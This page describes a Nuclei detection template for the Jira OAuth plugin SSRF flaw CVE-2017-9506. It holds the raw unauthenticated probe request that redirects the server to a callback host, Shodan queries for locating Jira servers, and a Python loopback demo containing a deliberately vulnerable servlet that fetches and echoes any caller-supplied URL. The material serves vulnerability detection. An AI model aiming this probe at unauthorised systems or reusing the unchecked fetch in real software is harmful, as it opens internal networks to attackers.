Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery
ID: CVE-2017-9506
Severity: medium
Author: pdteam
Tags: cve,cve2017,atlassian,jira,ssrf,oast
Description
The IconUriServlet of the Atlassian OAuth plugin (shipped with Jira) from version 1.3.0 before 1.9.12 and from version 2.0.0 before 2.0.4 fetches the URL given in its consumerUri parameter server-side, without requiring authentication. A remote attacker can therefore use the Jira server as a proxy to read the content of internal network resources (Server-Side Request Forgery, CWE-918) and, because the fetched content is returned to the caller, stage a cross-site scripting attack through the same endpoint. Fixed releases are 1.9.12 and 2.0.4 of the OAuth plugin.
YAML Source
id: CVE-2017-9506

info:
  name: Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery
  author: pdteam
  severity: medium
  description: The Atlassian Jira IconUriServlet of the OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 contains a cross-site scripting vulnerability which allows remote attackers to access the content of internal network resources and/or perform an attack via Server Side Request Forgery.
  impact: |
    Successful exploitation of these vulnerabilities could lead to unauthorized access, data theft, and potential server-side attacks.
  remediation: |
    Apply the latest security patches provided by Atlassian to mitigate these vulnerabilities.
  reference:
    - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
    - https://ecosystem.atlassian.net/browse/OAUTH-344
    - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
    - https://nvd.nist.gov/vuln/detail/CVE-2017-9506
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-9506
    cwe-id: CWE-918
    epss-score: 0.00575
    epss-percentile: 0.77897
    cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: oauth
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
  tags: cve,cve2017,atlassian,jira,ssrf,oast

http:
  - raw:
      - |
        GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100efbb9ea8d19c6a3930cee9c8777e2f432c25319a1a7b554b2a5aaf222250bdfb02205a22fcf37c154ff5d095d6c680fb6ff90c217e8345386d3914287589b91aefa6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This Nuclei template sends a single unauthenticated GET to /plugins/servlet/oauth/users/icon-uri with consumerUri pointing at an Interactsh callback host. A vulnerable instance fetches that URL server-side, and the interactsh_protocol matcher reports a hit when the callback host records an HTTP interaction, so detection is out-of-band (OAST) rather than based on anything in the target's own response. Two caveats follow. The scanner needs a reachable Interactsh server (Nuclei falls back to its public servers by default; -iserver selects your own), and an unpatched Jira whose outbound HTTP egress is filtered never triggers the matcher, so a clean result does not prove the instance is patched. A hit, on the other hand, shows that the server will fetch an attacker-chosen URL, which is the SSRF primitive described above; the affected version ranges in the template metadata are the authoritative way to confirm exposure when egress is blocked.
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-9506.yaml"
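To make concrete what the template's out-of-band matcher actually establishes, the following is an added loopback reproduction written for this page; it is not code from the template, from Nuclei or from Atlassian. The icon-uri servlet is a constructed stand-in for the vulnerable endpoint, the callback listener plays the role of the Interactsh server, and the allowlist "hardening" together with the hostname icons.example.internal are assumptions for illustration, not Atlassian's actual fix.

```python
"""Loopback reproduction of the OAST-style SSRF check performed by the Nuclei
template for CVE-2017-9506. Nothing here talks to a real Jira: the icon-uri
servlet is a constructed stand-in and the listener stands in for Interactsh."""
import secrets
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import URLError
from urllib.parse import parse_qs, quote, urlparse
from urllib.request import ProxyHandler, build_opener

ICON_PATH = "/plugins/servlet/oauth/users/icon-uri"
_opener = build_opener(ProxyHandler({}))  # ignore env proxies so loopback stays local


class CallbackListener(ThreadingHTTPServer):
    """Stand-in for interactsh: records the path of every request it receives."""

    def __init__(self):
        super().__init__(("127.0.0.1", 0), _CallbackHandler)
        self.hits = []
        self.lock = threading.Lock()


class _CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        with self.server.lock:
            self.server.hits.append(self.path)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):  # keep the demo quiet
        pass


def make_icon_servlet(allowed_hosts=None):
    """Handler class imitating the icon-uri servlet. allowed_hosts=None gives the
    vulnerable behaviour (fetch whatever consumerUri names). A set of hostnames
    applies a generic allowlist: an assumed hardening, not Atlassian's real fix."""

    class IconUriServlet(BaseHTTPRequestHandler):
        def do_GET(self):
            url = urlparse(self.path)
            if url.path != ICON_PATH:
                self.send_error(404)
                return
            consumer_uri = parse_qs(url.query).get("consumerUri", [None])[0]
            if not consumer_uri:
                self.send_error(400, "consumerUri missing")
                return
            if allowed_hosts is not None and urlparse(consumer_uri).hostname not in allowed_hosts:
                self.send_error(403, "consumerUri host not allowed")
                return
            try:  # server-side fetch of a caller-chosen URL: this is the SSRF primitive
                with _opener.open(consumer_uri, timeout=2) as resp:
                    body = resp.read()
            except URLError:
                self.send_error(502)
                return
            self.send_response(200)
            self.end_headers()
            self.wfile.write(body)  # fetched content is echoed back to the caller

        def log_message(self, *args):
            pass

    return IconUriServlet


def serve_in_background(server):
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def check_ssrf(target_base, listener, timeout=3.0):
    """Mirror the template: one GET whose consumerUri points at our listener, then
    report a match only if the listener saw an HTTP request carrying our token."""
    token = secrets.token_hex(8)
    callback = f"http://127.0.0.1:{listener.server_port}/{token}"
    try:
        _opener.open(f"{target_base}{ICON_PATH}?consumerUri={quote(callback, safe='')}",
                     timeout=timeout).close()
    except URLError:
        pass  # the target's own reply is irrelevant; only the out-of-band hit counts
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        with listener.lock:
            if any(token in path for path in listener.hits):
                return True
        time.sleep(0.05)
    return False


def run_demo():
    """Start the listener plus a vulnerable and an allowlisted servlet on loopback
    and run the check against both."""
    listener = serve_in_background(CallbackListener())
    vulnerable = serve_in_background(ThreadingHTTPServer(("127.0.0.1", 0), make_icon_servlet()))
    hardened = serve_in_background(
        ThreadingHTTPServer(("127.0.0.1", 0), make_icon_servlet({"icons.example.internal"})))
    try:
        return {
            "vulnerable": check_ssrf(f"http://127.0.0.1:{vulnerable.server_port}", listener),
            "hardened": check_ssrf(f"http://127.0.0.1:{hardened.server_port}", listener),
        }
    finally:
        for srv in (listener, vulnerable, hardened):
            srv.shutdown()
            srv.server_close()


if __name__ == "__main__":
    print(run_demo())
```

The vulnerable stand-in produces a callback and the allowlisted one does not, which is exactly the signal the template's interactsh_protocol matcher consumes. Note that a target with outbound HTTP blocked would look identical to the hardened case from the scanner's side, which is why a negative OAST result is not evidence of patching.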